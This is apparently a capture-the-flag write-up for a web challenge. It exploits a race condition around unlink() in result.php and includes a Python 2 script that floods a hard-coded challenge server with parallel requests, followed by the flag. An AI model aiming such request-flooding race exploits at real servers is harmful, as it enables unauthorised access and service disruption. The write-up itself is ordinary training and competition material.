In this challenge, we will play Among Us.
Click a name and we will be redirected to the result page: /result.php?choose=CT1
Delete parameter ‘choose
‘ to access ‘result.php’ and we have:
Therefore, we need to use Race Condition to pass unlink()
function and run echo
.
Python2 code is:
from multiprocessing import Process
import requests
def f():
r = requests.get("http://35.198.195.87:7002/result.php?choose=CT1")
print r.text
if __name__ == '__main__':
while 1:
p = Process(target=f )
p2 = Process(target=f )
p3 = Process(target=f )
p4 = Process(target=f )
p5 = Process(target=f )
p.start()
p2.start()
p3.start()
p4.start()
p5.start()
p.join()
p2.join()
p3.join()
p4.join()
p5.join()
print "-----------------------"
And we found the flag.
Flag: FUSEC{Hua_voi_moi_nguoi_lan_nay_lan_cuoi_dao_de}